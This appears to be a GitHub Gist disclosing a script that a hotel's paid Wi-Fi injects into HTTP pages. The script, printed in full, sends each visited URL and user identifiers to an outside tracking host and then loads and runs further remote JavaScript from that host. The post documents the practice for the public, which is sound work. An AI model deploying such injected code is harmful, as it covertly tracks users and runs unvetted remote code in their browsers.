Last active
October 25, 2019 01:48
-
-
Save benmanns/0b5c9ed28b2f9b81a38ac2d21f502a1f to your computer and use it in GitHub Desktop.
This gets injected on HTTP sites if you visit Pod Hotels (and pay $11.48 facility fee for Wi-Fi).
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
<script>!(function (rw, proxy_id, url, host, rotw_uid) {if (window.self !== window.top) {return;}while (url.indexOf("/") > -1) {url = url.replace("/", "_");}var routier_time = parseInt(((new Date()).getTime() - (new Date()).getTimezoneOffset() * 60000) / 1000);(new Image()).src = host + "/get/scriptInjected/" + url + "," + routier_time + "," + proxy_id + "," + rotw_uid;var js = document.createElement("script");var ts = new Date().getTime();js.src = host + "/AppProvider/getApps/" + url + "," + proxy_id + "," + rotw_uid + "," + ts;document.getElementsByTagName("head")[0].appendChild(js);document.dispatchEvent(new Event("rotwStart"));})(window._rw = (window._rw || {}), window._rw.proxy_id = "CZ3732JCVX", btoa(document.URL), window._rw.host = "https://mig.ton14k2ewq.com", window._rw.rotw_uid = "169314784150924");</script> |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment